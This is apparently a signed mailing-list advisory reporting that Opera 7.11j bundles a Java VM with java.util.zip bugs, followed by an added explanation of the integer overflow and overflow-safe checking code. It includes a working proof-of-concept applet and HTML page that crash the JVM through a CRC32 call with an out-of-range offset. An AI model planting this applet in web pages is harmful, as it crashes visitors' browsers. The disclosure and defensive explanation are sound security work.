-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

the just released Opera 7.11j comes with a Java VM (1.4.1_01) that is
vulnerable to the java.util.zip.* bugs that can cause denial of service
via Java applets like the one with source printed below.

Therefore my suggestion towards the Opera deployment team is to bundle
Java 1.4.1_02, which is not vulnerable to the java.util.zip bugs.
All 1.3.1 versions are still vulnerable!

If you already installed Java 1.4.1_02 prior to installing Opera you are
not vulnerable, because the most current JVM seems to be chosen by Opera
when running applets.

If you are interested in the details (not Opera-specific), read the whole
story at www.illegalaccess.org or read:

http://developer.java.sun.com/developer/bugParade/bugs/4811913.html
http://developer.java.sun.com/developer/bugParade/bugs/4812181.html
http://developer.java.sun.com/developer/bugParade/bugs/4812006.html
http://developer.java.sun.com/developer/bugParade/bugs/4811927.html
http://developer.java.sun.com/developer/bugParade/bugs/4811917.html

Sincerely
Marc Schoenefeld

The applet code:

========CRCApplet.java=======================
import java.applet.Applet;
import java.awt.Graphics;

public class CRCApplet extends Applet {
    public void paint(Graphics g) {
        (new java.util.zip.CRC32()).update(new byte[0], Integer.MAX_VALUE-3, 4);
    }
}
=============================================

The corresponding HTML:

=======CRCApplet.html======================
<html>
<body>
<applet code=CRCApplet.class width=400 height=400>
</applet>
</body>
</html>
===========================================

- --

Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous

Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (AIX)
Comment: For info see http://www.gnupg.org

iD8DBQE+vYs/qCaQvrKNUNQRAqWUAJ9tdtt9uOboP2fq+/ZqhRqE8Fet7gCfffsD
nBk6PscPB5WQYpqgZaItaDw=
=uUS/
-----END PGP SIGNATURE-----
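
Added example, not part of the original post and not JDK source: the applet passes an offset of Integer.MAX_VALUE-3 and a length of 4 for an empty array, so offset plus length exceeds the int range. The class below shows how a range check written as `off + len <= b.length` wraps for exactly these values, next to an overflow-safe form and a wrapper that validates before calling CRC32. The class and method names are hypothetical, and the post does not say what form the check in the affected JVMs took.

```java
import java.nio.charset.StandardCharsets;
import java.util.zip.CRC32;

public class SafeCrcUpdate {

    // Naive form: off + len wraps to a negative int once the true sum
    // exceeds Integer.MAX_VALUE, so the comparison passes by accident.
    static boolean naiveRangeOk(byte[] b, int off, int len) {
        return off >= 0 && len >= 0 && off + len <= b.length;
    }

    // Overflow-safe form: off and len are never added. len >= 0 is tested
    // first, so b.length - len stays within [Integer.MIN_VALUE+1, b.length].
    static boolean safeRangeOk(byte[] b, int off, int len) {
        return off >= 0 && len >= 0 && off <= b.length - len;
    }

    // Hypothetical wrapper: validate in Java before the arguments reach the
    // checksum implementation, so a bad range ends in an exception.
    static long checkedCrc(byte[] b, int off, int len) {
        if (b == null) {
            throw new NullPointerException("b");
        }
        if (!safeRangeOk(b, off, len)) {
            throw new ArrayIndexOutOfBoundsException(
                "off=" + off + " len=" + len + " length=" + b.length);
        }
        CRC32 crc = new CRC32();
        crc.update(b, off, len);
        return crc.getValue();
    }

    public static void main(String[] args) {
        byte[] empty = new byte[0];
        int off = Integer.MAX_VALUE - 3;   // arguments used by the applet
        int len = 4;

        System.out.println("off + len as int : " + (off + len));
        System.out.println("naive check ok   : " + naiveRangeOk(empty, off, len));
        System.out.println("safe check ok    : " + safeRangeOk(empty, off, len));
        try {
            checkedCrc(empty, off, len);
        } catch (ArrayIndexOutOfBoundsException e) {
            System.out.println("rejected         : " + e.getMessage());
        }
        // Constructed sample input: a valid range still checksums normally.
        byte[] sample = "123456789".getBytes(StandardCharsets.US_ASCII);
        System.out.println("valid range crc  : "
            + Long.toHexString(checkedCrc(sample, 0, sample.length)));
    }
}
```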